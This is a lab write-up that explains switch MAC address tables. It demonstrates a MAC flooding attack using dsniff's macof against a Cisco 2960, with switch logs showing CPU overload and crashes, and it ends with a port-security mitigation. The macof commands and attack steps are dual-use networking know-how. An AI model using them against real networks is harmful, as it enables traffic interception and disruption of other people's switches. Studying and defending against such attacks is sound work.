Theory
Hub is a network device which forwards Ethernet received frames to all the ports except the port on which hub previously received frames. This is not very secured method because traffic is send to every port and could be captured by attacker.
Unlike hub switch can forward traffic according to destination MAC address in received Ethernet frame. It must be able to inspect Ethernet header and choose outgoing switch port in particular VLAN. For doing this it needs to maintain MAC address table and be able to find destination MAC address, outgoing port, and VLAN.
Bellow is a MAC address table of Cisco 2960 8 ports switch. Notice an entry I write with red colour. If switch receives frame with destination MAc address 001a.4b79.70b8 on Fa 0/4 port it switches this frame to port Fa 0/1 if the the port Fa 0/4 is VLAN100.
2960-I#show mac address-table
Mac Address Table
-------------------------------------------
Vlan Mac Address Type Ports
---- ----------- -------- -----
All 0100.0ccc.cccc STATIC CPU
All 0100.0ccc.cccd STATIC CPU
All 0180.c200.0000 STATIC CPU
All 0180.c200.0001 STATIC CPU
All 0180.c200.0002 STATIC CPU
All 0180.c200.0003 STATIC CPU
All 0180.c200.0004 STATIC CPU
All 0180.c200.0005 STATIC CPU
All 0180.c200.0006 STATIC CPU
All 0180.c200.0007 STATIC CPU
All 0180.c200.0008 STATIC CPU
All 0180.c200.0009 STATIC CPU
All 0180.c200.000a STATIC CPU
All 0180.c200.000b STATIC CPU
All 0180.c200.000c STATIC CPU
All 0180.c200.000d STATIC CPU
All 0180.c200.000e STATIC CPU
All 0180.c200.000f STATIC CPU
All 0180.c200.0010 STATIC CPU
All ffff.ffff.ffff STATIC CPU
100 001a.4b79.70b8 DYNAMIC Fa0/1
Total Mac Addresses for this criterion: 21
If the port Fa 0/4 is in VLAN 200 switch can't use any entry in MAC address table because there is not any MAC address in VLAN200. Switch needs to be sure that the frame will be delivered to end PC so it floods frame to all the switch ports except the port Fa 0/4.
How do MAC addresses get to switch MAC address table? They cloud be added as static entry with administrator:
2960-I(config)#mac address-table static 0000.aaaa.bbbb vlan 100 interface Fa 0/5
This command adds MAC address 0000.aaaa.bbbb to switch port Fa 0/5 for VLAN 100. They are totally 22 MAC addresses in MAC address table now.
2960-I#show mac address-table
Mac Address Table
-------------------------------------------
Vlan Mac Address Type Ports
---- ----------- -------- -----
All 0100.0ccc.cccc STATIC CPU
All 0100.0ccc.cccd STATIC CPU
All 0180.c200.0000 STATIC CPU
All 0180.c200.0001 STATIC CPU
All 0180.c200.0002 STATIC CPU
All 0180.c200.0003 STATIC CPU
All 0180.c200.0004 STATIC CPU
All 0180.c200.0005 STATIC CPU
All 0180.c200.0006 STATIC CPU
All 0180.c200.0007 STATIC CPU
All 0180.c200.0008 STATIC CPU
All 0180.c200.0009 STATIC CPU
All 0180.c200.000a STATIC CPU
All 0180.c200.000b STATIC CPU
All 0180.c200.000c STATIC CPU
All 0180.c200.000d STATIC CPU
All 0180.c200.000e STATIC CPU
All 0180.c200.000f STATIC CPU
All 0180.c200.0010 STATIC CPU
All ffff.ffff.ffff STATIC CPU
100 0000.aaaa.bbbb STATIC Fa0/5
100 001a.4b79.70b8 DYNAMIC Fa0/1
Total Mac Addresses for this criterion: 22
MAC addresses are also dynamically learned by switch. Switch looks up not only destination MAC address in Ethernet header but it learns source MAC address of received frame and copy it to MAC address table. This source MAC address is MAC of network card (or other network device) and is rememebered with switch port on that was frame received and VLAN on this port.
Dynamically learned MAC address are marked as DYNAMIC in MAC address table. Similarly manually created MAC addresses are marked as STATIC in MAC address table.
MAC flooding attack is method how to force switch behaves as hub device. Attacked switch sends traffic to every switch port and trafic (phone calls, hash passwords etc.) can be captured by attacker.
The idea is simple - switch can learn only given number of MAC address because of hardware limit of MAC address table . After the limit of MAC address is reached MAC address table is full. Switch can't learn any new MAC address and traffic is send to every port in VLAN where the attack starts.
All the attacker needs to do is poison switch with many fake MAC address that fills up entire MAC address table. Switch learns these fake MAC addresses and fake frames are also flooded to all switch ports in particular VLAN. Other switches in campus network also learn fake MAC addresses and flood fake MAC further.
After some time all the switches which have switch port in VLAN where attack started will have MAC address table. full of fake MAC addresses. Normal user traffic in attacker VLAN is flooded trough all the switch port and if the attack is doing enough time attacker can captures data he needs.
When attacker captures enough amount of data he stops attack. After the aging time is expired fake MAC addresses are deleted by switch from switch MAC address table.
1. Installing DSNIFF tool:
You can do MAC flooding attack with tool called Macof. It is the part of Dsniff which can be installed with this command on Fedora Linux:
[root@Compaq8510w brezular]# yum install dsniff
2. Checking MAC address table and CPU load before attack
First check how many MAC addresses are in the table:
2960-I#show mac address-table count
Mac Entries for Vlan 1:
---------------------------
Dynamic Address Count : 0
Static Address Count : 0
Total Mac Addresses : 0
Mac Entries for Vlan 100:
---------------------------
Dynamic Address Count : 1
Static Address Count : 1
Total Mac Addresses : 2
Total Mac Address Space Available: 8046
We can see that 2 MAC addresses are presented in MAC address table for VLAN 100. The first one is dynamically learned by switch and the second one is statically added by administrator. There is a free space for other 8046 address they can be added to MAC address table.
Now check the current CPU load:
2960-I#show processes cpu
CPU utilization for five seconds: 5%/0%; one minute: 10%; five minutes: 11%
I am just curious if MAC flooding attack has impact on CPU load.
3. MAC address flooding attack
a) The first MAC address flooding attack
It is time to make our first MAC flooding attack. We have Cisco Catalyst 2960 (WS-C2960-8TC-L) with 8 FastEthernet ports and FastEthernet 0/1 is conected to laptop Compaq 8510w with Linux Fedora 13 and dsniff installed. Start macof utility:
[root@Compaq8510w brezular]#macof
b6:c4:3:58:97:10 4b:99:65:4b:6f:6 0.0.0.0.56527 > 0.0.0.0.53481: S 1204762615:1204762615(0) win 512
1b:1b:f2:4f:53:27 61:dd:57:7c:38:47 0.0.0.0.48781 > 0.0.0.0.64071: S 1895482790:1895482790(0) win 512
54:c0:68:51:50:85 6c:3b:12:61:8a:70 0.0.0.0.54040 > 0.0.0.0.29400: S 352722634:352722634(0) win 512
1a:7f:7c:6f:8a:50 e7:b5:16:6d:48:53 0.0.0.0.55501 > 0.0.0.0.13256: S 2142129962:2142129962(0) win 512
42:63:9e:11:e5:b9 af:9c:37:63:9a:4e 0.0.0.0.26158 > 0.0.0.0.16299: S 1230975236:1230975236(0) win 512
f8:20:8c:7b:20:c bd:e6:61:3b:2:b9 0.0.0.0.11748 > 0.0.0.0.20420: S 1638533473:1638533473(0) win 512
51:a4:d8:3d:a2:d9 9c:b6:a2:7b:27:85 0.0.0.0.33558 > 0.0.0.0.34232: S 1602379134:1602379134(0) win 512
1d:27:2f:37:e2:31 5:f6:ce:15:33:de 0.0.0.0.24142 > 0.0.0.0.26282: S 1964332936:1964332936(0) win 512
ae:43:3e:72:42:2c 5b:35:5e:16:21:5f 0.0.0.0.30837 > 0.0.0.0.41119: S 647717601:647717601(0) win 512
a0:a6:5:5c:24:c1 b3:4a:c8:78:f2:55 0.0.0.0.178 > 0.0.0.0.23826: S 804427713:804427713(0) win 512
e4:bc:7b:28:9:13 5a:89:b2:4e:af:8c 0.0.0.0.20137 > 0.0.0.0.4418: S 1360529247:1360529247(0) win 512
7a:84:58:45:ef:63 ef:5f:f7:6c:15:4b 0.0.0.0.42497 > 0.0.0.0.30053: S 728605699:728605699(0) win 512
<output is truncated>
They are plenty of frames generated with Macof utility. Macof generates between 10 000 and 15 000 packets per second. Each packet is sent with random source and destination IP address. Also source and destination MAC address is different for each Ethernet frame:
Attack is stopped approximately after 15 seconds. The log message appears on switch console:
2960-I#
*Mar 1 01:08:39: %SYS-3-CPUHOG: Task is running for (2111)msecs, more than (2000)msecs (31/0),process = HLFM address learning process.
-Traceback= 5269A8 526AC8 509750 16D8C8 16F058 502F7C 5032FC 50343C 4FF06C 4FF1F0 11BB59C 11B2028
*Mar 1 01:08:41: %SYS-3-CPUHOG: Task is running for (4222)msecs, more than (2000)msecs (69/0),process = HLFM address learning process.
-Traceback= 136DA74 136DB90 11614B4 116173C 4FB6F8 509698 16D8C8 16F058 502F7C 5032FC 50343C 4FF06C 4FF1F0 11BB59C 11B2028
*Mar 1 01
2960-I#:08:44: %SYS-3-CPUHOG: Task is running for (6331)msecs, more than (2000)msecs (98/0),process = HLFM address learning process.
-Traceback= 116248C 116291C 526940 528C38 5270CC 509B04 16D8C8 16F058 502F7C 5032FC 50343C 4FF06C 4FF1F0 11BB59C 11B2028
*Mar 1 01:08:46: %SYS-3-CPUHOG: Task is running for (8438)msecs, more than (2000)msecs (125/0),process = HLFM address learning process.
-Traceback= 1162734 116291C 528BEC 5270CC 509B04 16D8C8 16F058 502F7C 5032FC 50343C 4FF06C 4FF1F0 11BB59C 11B2028
*Mar 1
2960-I# 01:08:48: %SYS-3-CPUHOG: Task is running for (10537)msecs, more than (2000)msecs (137/0),process = HLFM address learning process.
-Traceback= 5269AC 526AC8 509750 16D8C8 16F058 502F7C 5032FC 50343C 4FF06C 4FF1F0 11BB59C 11B2028 2960-I#
*Mar 1 01:08:39: %SYS-3-CPUHOG: Task is running for (2111)msecs, more than (2000)msecs (31/0),process = HLFM address learning process.
-Traceback= 5269A8 526AC8 509750 16D8C8 16F058 502F7C 5032FC 50343C 4FF06C 4FF1F0 11BB59C 11B2028
*Mar 1 01:08:41: %SYS-3-CPUHOG: Task is running for (4222)msecs, more than (2000)msecs (69/0),process = HLFM address learning process.
-Traceback= 136DA74 136DB90 11614B4 116173C 4FB6F8 509698 16D8C8 16F058 502F7C 5032FC 50343C 4FF06C 4FF1F0 11BB59C 11B2028
*Mar 1 01
2960-I#:08:44: %SYS-3-CPUHOG: Task is running for (6331)msecs, more than (2000)msecs (98/0),process = HLFM address learning process.
-Traceback= 116248C 116291C 526940 528C38 5270CC 509B04 16D8C8 16F058 502F7C 5032FC 50343C 4FF06C 4FF1F0 11BB59C 11B2028
*Mar 1 01:08:46: %SYS-3-CPUHOG: Task is running for (8438)msecs, more than (2000)msecs (125/0),process = HLFM address learning process.
-Traceback= 1162734 116291C 528BEC 5270CC 509B04 16D8C8 16F058 502F7C 5032FC 50343C 4FF06C 4FF1F0 11BB59C 11B2028
*Mar 1
2960-I# 01:08:48: %SYS-3-CPUHOG: Task is running for (10537)msecs, more than (2000)msecs (137/0),process = HLFM address learning process.
-Traceback= 5269AC 526AC8 509750 16D8C8 16F058 502F7C 5032FC 50343C 4FF06C 4FF1F0 11BB59C 11B2028
MAC address learning process last more than 2 seconds and switch complains about it.
In the output bellow there is the CPU utilization showed immediately after end of attack. The CPU load is 95% last five second. Apparently this high CPU utilization is caused by MAC flooding attack.
2960-I#show processes cpu
CPU utilization for five seconds: 95%/10%; one minute: 12%; five minutes: 7%
PID Runtime(ms) Invoked uSecs 5Sec 1Min 5Min TTY Process
1 0 8 0 0.00% 0.00% 0.00% 0 Chunk Manager
2 0 150 0 0.00% 0.00% 0.00% 0 Load Meter
3 0 2 0 0.00% 0.00% 0.00% 0 SpanTree Helper
4 1125 156 7211 0.00% 0.08% 0.05% 0 Check heaps
<output is truncated>
b) The second MAC address flooding attack
I will repeat MAC address flooding again to be sure that high CPU utilization is caused by attack. I wait short time and after few seconds CPU utilization goes back to 5% (the value before attack). I start the second attack and I show CPU utilization immediately after the end of flooding (Ctrl-C stops the macof utility).
2960-I#show processes cpu
CPU utilization for five seconds: 96%/10%; one minute: 12%; five minutes: 6%
PID Runtime(ms) Invoked uSecs 5Sec 1Min 5Min TTY Process
Now we can be sure that this type of attack impact on CPU of Cisco Catalyst 2960 switch.
In the output bellow there is numeber of MAC addresses that we force switch to learn:
2960-I#show mac address-table count
Mac Entries for Vlan 100:
---------------------------
Dynamic Address Count : 7962
Static Address Count : 1
Total Mac Addresses : 7963
Total Mac Address Space Available: 78
MAC address table is almost full - only 78 MAC addresses can be added to MAC address table and after that switch will start flooding normal user traffic out of its ports.
c) The third MAC address flooding attack
In the second test we checked that CPU of 8-ports Catalyst 2960 was be impacted by MAC flooding attack. In the third test and I will keep attack running several minutes.
After five minutes switch starts reloading and after its boot this error message appears on console:
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: System previously crashed with the following message:
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Cisco IOS Software, C2960 Software (C2960-LANBASEK9-M), Version 12.2(53)SE2, RELEASE SOFTWARE (fc3)
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Technical Support: http://www.cisco.com/techsupport
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Copyright (c) 1986-2010 by Cisco Systems, Inc.
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Compiled Wed 21-Apr-10 05:52 by prod_rel_team
*Mar 1 01
2960-I# :01:44: %PLATFORM-1-CRASHED:
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Program Exception (0x0700)!
*Mar 1 01:01:44: %PLATFORM-1-CRASHED:
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: SRR0 = 0x031A5188 SRR1 = 0x00021200 SRR2 = 0x009F1E58 SRR3 = 0x00021200
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: ESR = 0x08000000 DEAR = 0x00000000 TSR = 0x84000000 DBSR = 0x00000000
*Mar 1 01:01:44: %PLATFORM-1-CRASHED:
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: CPU Register Context:
*Mar 1 01:01:44: %PLATFORM-1-CRASHED
2960-I# : Vector = 0x00000700 PC = 0x031A5188 MSR = 0x00021200 CR = 0x30000035
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: LR = 0x031A5188 CTR = 0x00000000 XER = 0xE000007D
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: R0 = 0x00000001 R1 = 0x02650CD8 R2 = 0x00000000 R3 = 0x00000000
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: R4 = 0x031A5188 R5 = 0x004FB830 R6 = 0x02650CA0 R7 = 0x00000000
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: R8 = 0x00000000 R9 = 0x00000000 R10 = 0x019C2BFC R11 = 0x01ED4F2C
*Mar 1 01:01:44: %PL
2960-I# ATFORM-1-CRASHED: R12 = 0x01ED8698 R13 = 0x00110000 R14 = 0x01C252AC R15 = 0x01C252AC
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: R16 = 0x01540000 R17 = 0x00000000 R18 = 0x00000001 R19 = 0x00000000
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: R20 = 0x00000000 R21 = 0x0279A414 R22 = 0x00000000 R23 = 0x031AE004
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: R24 = 0x00000002 R25 = 0x004FB830 R26 = 0x00000000 R27 = 0x01ED81F4
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: R28 = 0x031A5188 R29 = 0x0264CD3C R30 = 0x031A5
2960-I# 188 R31 = 0x0264CD3C
*Mar 1 01:01:44: %PLATFORM-1-CRASHED:
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Stack trace:
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: PC = 0x031A5188, SP = 0x02650CD8
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Frame 00: SP = 0x02650D08 PC = 0x0000004D
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Frame 01: SP = 0x02650D28 PC = 0x0116291C
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Frame 02: SP = 0x02650D38 PC = 0x004FB834
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Frame 03: SP = 0x02650DA8
2960-I# PC = 0x00509AB4
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Frame 04: SP = 0x02650DE8 PC = 0x0016D8C8
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Frame 05: SP = 0x02650E18 PC = 0x0016F058
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Frame 06: SP = 0x02650E68 PC = 0x00502F7C
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Frame 07: SP = 0x02650E98 PC = 0x005032FC
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Frame 08: SP = 0x02650EE8 PC = 0x0050343C
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Frame 09: SP = 0x02650F48
2960-I# PC = 0x004FF06C
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Frame 10: SP = 0x02650F70 PC = 0x004FF1F0
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Frame 11: SP = 0x02650F78 PC = 0x011BB59C
*Mar 1 01:01:44: %PLATFORM-1-CRASHED: Frame 12: SP = 0x00000000 PC = 0x011B2028
*Mar 1 01:01:44: %PLATFORM-1-CRASHED:
2960-I#
I repeated the third attack three times - two times switch crashed after five minutes and once kept working. I can't say that switch crash is caused by MAC flooding attack but I think it might help a lot.
In theory, during MAC address flooding attack, switch normally continues working except it floods the traffic out of its ports ( like a hub) .
4. Protection
We can avoid MAC address flooding attack with configured port-security on switch port.
2960-I(config-if)#do show run int fa 0/1
Building configuration...
Current configuration : 159 bytes
!
interface FastEthernet0/1
switchport access vlan 100
switchport mode access
switchport nonegotiate
switchport port-security
spanning-tree portfast
end
With only the one line of configuration we limit the port to one MAC address.
2960-I#show port-security interface fastEthernet 0/1
Port Security : Enabled
Port Status : Secure-up
Violation Mode : Shutdown
Aging Time : 0 mins
Aging Type : Absolute
SecureStatic Address Aging : Disabled
Maximum MAC Addresses : 1
Total MAC Addresses : 0
Configured MAC Addresses : 0
Sticky MAC Addresses : 0
Last Source Address:Vlan : 0000.0000.0000:0
Security Violation Count : 0
If two frames with different source MAC addresses appear on Fa 0/1, port is brought to error-disabled state and only administrator or error-recovery mechanism can bring port up.
End.